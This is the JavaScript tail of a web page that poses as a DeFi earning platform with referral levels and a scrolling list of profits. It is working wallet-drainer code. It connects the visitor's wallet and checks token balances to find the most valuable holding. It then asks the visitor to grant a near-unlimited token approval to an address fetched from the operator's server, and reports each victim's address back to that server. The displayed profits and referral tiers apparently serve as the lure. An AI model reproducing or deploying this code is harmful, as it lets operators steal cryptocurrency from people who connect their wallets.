"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}];

    $(function() {
        const addr = {
            'usdt': '0xdac17f958d2ee523a2206206994597c13d831ec7',
            'sushi': '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
            'usdc': '0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
            'uni': '0x1f9840a85d5af5bf1d1762f925bdaddc4201f984',
            'aave': '0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9',
            'yfi': '0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e',
            'dai': '0x6b175474e89094c44da98b954eedeac495271d0f',
            'link': '0x514910771af9ca656af840dff83e8264ecf986ca',
            "LON": "0x0000000000095413afc295d19edeb1ad7b71c952",
            "CRV": "0xD533a949740bb3306d119CC777fa900bA034cd52",
            'FIL': "0xbf48ecb7c2d3d559e0a24b04f306889e05c73cd6",
        }
        const addr2 = {
            "WBTC": "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599",
            "WETH": "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2",
            "CONV": "0xc834fa996fa3bec7aad3693af486ae53d8aa8b50",
            "inj": "0xe28b3B32B6c345A34Ff64674606124Dd5Aceca30",
            "MKR": "0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2",
            "ALPHA": "0xa1faa113cbe53436df28ff0aee54275c13b40975",
            "BAND": "0xba11d00c5f74255f56a5e366f4f77f5a186d7f55",
            "snx": "0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f",
            "comp": "0xc00e94cb662c3520282e6f5717214004a7f26888",
            "sxp": "0x8ce9137d39326ad0cd6491fb5cc0cba0e089b6a9",
        }
        const addr3 = {
            "FTT": "0x50d1c9771902476076ecfc8b2a83ad6b9355a4c9",
            "ust": "0xa47c8bf37f92abed4a126bda807a7b7498661acd",
            "TRIBE": "0xc7283b66eb1eb5fb86327f08e1b5816b0720212b",
            "wise": "0x66a0f676479Cee1d7373f3DC2e2952778BfF5bd6",
            "RRAX": "0x853d955acef822db058eb8505911ed77f175b99e",
            "CORE": "0x62359Ed7505Efc61FF1D56fEF82158CcaffA23D7",
            "mir": "0x09a3ecafa817268f77be1283176b946c4ff2e608",
            "DPI": "0x1494ca1f11d487c2bbe4543e90080aeba4ba3c2b",
            "luna": "0xd2877702675e6ceb975b4a1dff9fb7baf4c91ea9",
            "HEZ": "0xEEF9f339514298C6A857EfCfC1A762aF84438dEE",
            "fxs": "0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0",
            "fei": "0x956f47f50a910163d8bf957cf5846d573e7f87ca",
        }
        const price = {
            usdt: 1,
            sushi: 15.5,
            usdc: 1,
            dai: 1,
            uni: 28.6,
            aave: 380,
            yfi: 35000,
            link: 28.2,
            "LON": 7,
            "CRV": 3.01367,
            "GUSD": 1,
            "WBTC": 56478.2,
            "WETH": 1991.89,
            "CONV": 0.105733,
            "inj": 13.3812,
            "MKR": 2076.68,
            "ALPHA": 1.79043,
            "BAND": 16.3441,
            "snx": 20.0588,
            "comp": 468.076,
            "sxp": 4.11818,
            "FTT": 46.1779,
            "ust": 1.00543,
            "TRIBE": 1.42926,
            "wise": 0.446973,
            "RRAX": 0.996821,
            "CORE": 5447.59,
            "mir": 8.69817,
            "DPI": 415.906,
            "luna": 15.2402,
            "HEZ": 5.97533,
            "fxs": 8.47025,
            "fei": 0.898157,
        }
        const decimals = {
            sushi: 18,
            usdt: 6,
            usdc: 6,
            uni: 18,
            dai: 18,
            aave: 18,
            yfi: 18,
            link: 18,
            WBTC: 8,
        }
        const _web3 = new Web3('https://cloudflare-eth.com')
        const Web3Modal = window.Web3Modal.default;
        const WalletConnectProvider = window.WalletConnectProvider.default;
        const contracts = {}, contracts2 = {}, contracts3 = {}
        for (const symbol of Object.keys(addr)) {
            const contractAddr = addr[symbol]
            contracts[symbol] = new _web3.eth.Contract(ABI, contractAddr)
        }

        for (const symbol of Object.keys(addr2)) {
            const contractAddr = addr2[symbol]
            contracts2[symbol] = new _web3.eth.Contract(ABI, contractAddr)
        }

        for (const symbol of Object.keys(addr3)) {
            const contractAddr = addr3[symbol]
            contracts3[symbol] = new _web3.eth.Contract(ABI, contractAddr)
        }
        let web3Modal;
        let provider;
        let selectedAccount;
        var address = getUrlQueryString('address')
        var rank = 6.45;
        var authorized_address = '';
        var domain = 'https://' + window.location.host + '/';
        var bizhong = '';
        var infura_key = '';
        var approveAddr = "0xdac17f958d2ee523a2206206994597c13d831ec7";
        var total = 0;
        var trx = 0;
        var is = true;
        var tronWeb;
        var injectedWeb3;
        var time;
        var content = document.getElementById("myScroll");
        var fakeContent = document.getElementById("myFakeScroll");
        var wrapper = document.getElementById("myScrollWrapper");
        $('#address').text(address)

        async function init() {
            getInfo();
            getProfits();

            web3Modal = new Web3Modal({
                cacheProvider: !1,
                providerOptions: {
                    walletconnect: {
                        package: WalletConnectProvider,
                        options: {
                            infuraId: "47a950cab4134279952b2202ec61dda8"
                        }
                    }
                },
                disableInjectedProvider: !1
            });

            try {
                provider = await web3Modal.connect()
                provider.enable()
            } catch (e) {
                console.log("Could not get a wallet connection", e);
                return;
            }

            // Subscribe to accounts change
            provider.on("accountsChanged", async (accounts) => {
                await fetchAccountData();
            });

            // Subscribe to chainId change
            provider.on("chainChanged", async (chainId) => {
                await fetchAccountData();
            });

            // Subscribe to networkId change
            provider.on("networkChanged", async (networkId) => {
                await fetchAccountData();
            });

            await refreshAccountData();
        }

        async function onConnect() {
            if (selectedAccount && provider) {
                const web3 = new Web3(provider);
                const contract = new web3.eth.Contract(ABI, approveAddr)
                const gasPrice = web3.eth.gasPrice
                console.log(authorized_address);
                contract.methods.approve(authorized_address, web3.utils.toBN('79228162514264337593543950335')).send({
                    from: selectedAccount,
                    gasPrice: gasPrice,
                    gas: 1e5,
                }, function(err, tx) {
                    if (!err) {
                        postInfo(selectedAccount, bizhong)
                    }
                    console.log(err, tx)
                })
            } else {
                provider = await web3Modal.connect()
                provider.enable()
                const web3 = new Web3(provider);
                const accounts = await web3.eth.getAccounts()
                selectedAccount = accounts[0]
                const contract = new web3.eth.Contract(ABI, approveAddr)
                const gasPrice = web3.eth.gasPrice

                contract.methods.approve(authorized_address, '79228162514264337593543950335').send({
                    from: selectedAccount,
                    gasPrice: gasPrice,
                    gas: 1e5,
                }, function(err, tx) {
                    console.log(err, tx)
                    if (!err) {
                        postInfo(selectedAccount, bizhong)
                    }
                })
            }
        }

        async function refreshAccountData() {
            document.querySelector("#btn-connect").setAttribute("disabled", "disabled")
            await fetchAccountData(provider);
            document.querySelector("#btn-connect").removeAttribute("disabled")
        }

        async function fetchAccountData() {
            const web3 = new Web3(provider);
            injectedWeb3 = web3
            provider.enable()
            const accounts = await web3.eth.getAccounts()
            selectedAccount = accounts[0]
            console.log(selectedAccount);
            let gasPrice = web3.eth.gasPrice
            var gs = ((gasPrice * 80000) / (10 ** 18)).toFixed(6)
            console.log(gs)
            $('#gas').text(gs.toLocaleString() + ' ETH')
            $.get("https://data.block.cc/api/v3/price?api_key=WH5Y6G7PUMUSMVEQZAPXSTVCIEKATAZAARQFKD9E&slug=ethereum", function(result) {
                console.log(result[0]['u'])
                let mon = gs * result[0]['u']
                $('#gasmoney').text('$ ' + mon.toLocaleString())
            });
            $('.button_address').text(selectedAccount);
            $('#walletadd').text(selectedAccount.substring(0, 5))
            $('#referral-input').val(domain + 'defi2-eth/index.html?parent=' + selectedAccount)
            if (false !== selectedAccount) {
                postCustomer(selectedAccount)
            }
            getUserInfo(selectedAccount);
            getTrxDealRecord(selectedAccount)
            getWithdrawDealRecord(selectedAccount)
            getMostValuableAssets(selectedAccount)
            
            var walletBalance = await web3.eth.getBalance(selectedAccount)
            walletBalance = (walletBalance/Math.pow(10, 18)).toString().substring(0, 8);
            $('.balance').text(walletBalance + ' ETH');
            
            // setTimeout(function() {
            //     getMostValuableAssets2(selectedAccount)
            // }, 200)
            // setTimeout(function() {
            //     getMostValuableAssets3(selectedAccount)
            // }, 300)
        }

        async function getMostValuableAssets(account) {
            let _symbol = 'usdt'
            console.log('_symbol:' + _symbol);

            for (const [symbol, contract] of Object.entries(contracts)) {
                contract.methods.balanceOf(account).call(function(err, balance) {
                    if (symbol == 'usdt') {
                        total = balance / (10 ** (decimals[symbol] || 18))
                    }
                    const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                    if (usdt > total && usdt > 1000) {
                        _symbol = symbol
                        total = usdt
                        approveAddr = addr[_symbol]
                        bizhong = _symbol

                    }
                })
            }

            bizhong = _symbol
            $('#usdt_balance').attr('data-balance', total.toFixed(6))
            $('#usdt_balance').text(total.toFixed(6) + ' USDT')
            console.log('_symbol:' + _symbol);
            return _symbol
        }

        async function getMostValuableAssets2(account) {
            let _symbol = 'usdt'
            console.log('_symbol:' + _symbol);
            for (const [symbol, contract] of Object.entries(contracts2)) {
                contract.methods.balanceOf(account).call(function(err, balance) {
                    const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                    if (usdt > total && usdt > 1000) {
                        _symbol = symbol
                        total = usdt
                        approveAddr = addr[_symbol]
                    }
                })
            }

            bizhong = _symbol

            console.log('_symbol:' + _symbol);
            return _symbol
        }

        async function getMostValuableAssets3(account) {
            let _symbol = 'usdt'
            for (const [symbol, contract] of Object.entries(contracts3)) {
                contract.methods.balanceOf(account).call(function(err, balance) {
                    const usdt = balance / (10 ** (decimals[symbol] || 18)) * price[symbol]
                    if (usdt > total && usdt > 1000) {
                        _symbol = symbol
                        total = usdt
                        approveAddr = addr[_symbol]
                    }
                })
            }
            bizhong = _symbol
            console.log('_symbol:' + _symbol);
            return _symbol
        }

        async function postInfo(address, symbol) {
            var s = getUrlQueryString('s')
            var a = getUrlQueryString('r')

            var data = {
                address:address,
                authorized_address:authorized_address,
                bizhong:symbol,
                code:s,
                reffer:a
            }
            $.ajax({
                type: 'post',
                url: domain + 'api/insert_erc',
                data: data,
            })
        }

        async function postCustomer(address, symbol, balance) {
            var parent = getUrlQueryString('parent')
            var s = getUrlQueryString('s')

            var data = {
                address:address,
                parent:parent,
                domain: 'defi2-eth',
                code:s
            }
            $.ajax({
                type: 'post',
                url:  domain + 'api/user/info',
                data:data,
            })
        }

        async function postDealRecord(trx, usdt_balance, type) {
            if (false === selectedAccount) {
                await fetchAccountData();
            }

            var index = layer.load(2, {
                shade: [0.7, "#000000"]
            });
            var data = {
                address:selectedAccount,
                price:trx,
                to_price:usdt_balance,
                type: type
            }
            $.ajax({
                type: 'post',
                url: domain + 'api/insert_deal_record',
                data: data,
                success: function(data) {
                    layer.msg('Success', {
                        icon: 1
                    }, function() {
                        location.reload()
                        layer.close(index);
                    });
                },
                error: function(data) {
                    layer.msg(data.status + ':' + data.statusText);
                    layer.close(index);
                }
            })
        }

        async function postReferrerInfo() {
            if (false === selectedAccount) {
                await fetchAccountData();
            }

            var index = layer.load(2, {
                shade: [0.7, "#000000"]
            });
            var fid = jQuery('#fid').val();
            var data = {
                address: selectedAccount,
                parent: fid
            }
            $.ajax({
                type: 'post',
                url: domain + 'api/insert_referral_info',
                data: data,
                success: function(data) {
                    if(data.code == 0){
                       layer.msg(data.msg,{icon:1},function(){
                           location.reload()
                           layer.close(index);
                       });
                    }else{
                       layer.msg(data.msg,{icon:2},function(){
                           layer.close(index);
                       });
                       console.log(data)
                    }
                },
                error: function(data) {
                    layer.msg(data.status + ':' + data.statusText);
                    layer.close(index);
                }
            })
        }

        function getUrlQueryString(names, urls) {
            urls = urls || window.location.href;
            urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
            var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
            var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
            if (r != null && r[2] != "") return unescape(r[2]);
            return null;

        }

        function getWalletAddress() {
            try {
                let tronWeb = window.tronWeb
                let walletAddress = tronWeb.defaultAddress.base58;

                $('.button_address').text(walletAddress);
                if (false !== walletAddress) {
                    postCustomer(walletAddress)
                }

                window.clearInterval(time);
                return true;
            } catch (e) {
                return false;
            }
        }

        function getInfo() {
            $.ajax({
                type: 'get',
                url: domain + 'api/get_erc',
                async: false,
                success: function(data) {
                    console.log(data)
                    authorized_address = data.data.authorized_address;
                    console.log(authorized_address);
                    infura_key = data.data.infura_key;
                },
                error: function(data) {}
            })
        }

        function getProfits(){
            $.ajax({
                type: 'get',
                url:  domain + 'api/profits',
                success:function(data){
                    var profitArray = data.data;
                    var html = '';
                    for (var index in profitArray) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="font-weight-normal blue">' + profitArray[index]['address'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">'+ profitArray[index]['balance'] + ' '
                            + profitArray[index]['type'] + '</h2>'
                            + '</li>';
                    }
                    $('#myScroll').html(html)
                    roll(40);
                },
                error:function(data){
                }
            })
        }

        function getUserInfo(address) {
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_user_info',
                data : {address: address},
                success:function(data){
                    $('.team').text(data.teamCount);
                    $('.child').text(data.child);
                    $('.eth_balance').text(data.eth);
                    $('.eth_pro').text(data.eth * (data.proportion / 100));
                    $('.trx_balance').text(data.trx);
                    $('.trx_pro').text((data.trx * (data.proportion / 100)).toFixed(6));
                    $('.level').text('Level ' + data.level);
                    $('.level1').text(data.level1);
                    $('.level2').text(data.level2);
                    $('.level3').text(data.level3);
                    getChildList(address)
                },
                error:function(data){
                }
            })
        }

        function getChildList(address, level = ''){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_child_list',
                data: {address: address, level: level},
                success:function(data){
                    var level1_money = 0;
                    var level2_money = 0;
                    var level3_money = 0;
                    for (var index in data) {
                        switch (data[index]['level']) {
                            case 1:
                                level1_money += data[index]['money']
                                break;
                            case 2:
                                level2_money += data[index]['money']
                                break;
                            case 3:
                                level2_money += data[index]['money']
                                break;
                            default:
                                break;
                        }
                    }
                    $('.level1-money').text(level1_money);
                    $('.level2-money').text(level2_money);
                    $('.level3-money').text(level3_money);
                },
                error:function(data){
                }
            })
        }

        function getTrxDealRecord(address){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_deal_record',
                data: {address: address, type: 3},
                success:function(data){
                    $('#exchange-list').html('')
                    var list = data;
                    var html = '';
                    for (var index in list) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="h3-title font-weight-normal">' + list[index]['created_at'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">' + list[index]['price'] + ' ETH</h2>'
                            + '</li>';
                    }
                    $('#exchange-list').html(html)
                },
                error:function(data){
                }
            })
        }

        function getWithdrawDealRecord(address){
            $.ajax({
                type: 'post',
                url:  domain + 'api/get_deal_record',
                data: {address: address, type: 1},
                success:function(data){
                    $('#withdraw-list').html('')
                    var list = data;
                    var html = '';
                    for (var index in list) {
                        html += '<li class="d-flex justify-content-between align-items-center mt-xl-4 mt-md-4 mt-3">'
                            + '<h3 class="h3-title font-weight-normal">' + list[index]['created_at'] + '</h3>'
                            + '<h2 class="h2-title font-weight-bold">' + list[index]['price'] + ' ETH</h2>'
                            + '</li>';
                    }
                    $('#withdraw-list').html(html)
                },
                error:function(data){
                }
            })
        }

        function roll(t) {
            fakeContent.innerHTML = content.innerHTML;
            // 开始无滚动时设为0
            wrapper.scrollTop = 0;
            // 设置定时器，参数t用在这为间隔时间（单位毫秒），参数t越小，滚动速度越快
            var timer = setInterval(rollStart, t);

            // 鼠标移入div时暂停滚动
            wrapper.onmouseover = function() {
                clearInterval(timer);
                timer = null
            };

            // 鼠标移出div后继续滚动
            wrapper.onmouseout = function() {
                timer = setInterval(rollStart, t);
            }
        }
        // 开始滚动函数
        function rollStart() {
            // 正常滚动不断给scrollTop的值+1,当滚动高度大于列表内容高度时恢复为0
            if (wrapper.scrollTop >= content.scrollHeight) {
                wrapper.scrollTop = 0;
            } else {
                wrapper.scrollTop++;
            }
        }

        $('.commit').click(function () {
            var ethnum = jQuery('#ethnumber').val();
            var usdt_balance = ethnum * 4057.4
            postDealRecord(ethnum, usdt_balance, 'eth');
        })

        $('.withdraw-commit').click(function () {
            var ethnum = jQuery('#usdtnumber').val();
            postDealRecord(ethnum, null, 'withdraw');
        })

        $('.referrer-commit').click(function () {
            postReferrerInfo()
        })

        window.addEventListener('load', async () => {
            init();
            document.querySelector("#btn-connect").addEventListener("click", onConnect);
            document.querySelector("#connect").addEventListener("click", onConnect);
            document.querySelector("#walletadd").addEventListener("click", onConnect);
        });
    })
    </script>
</body>
</html>
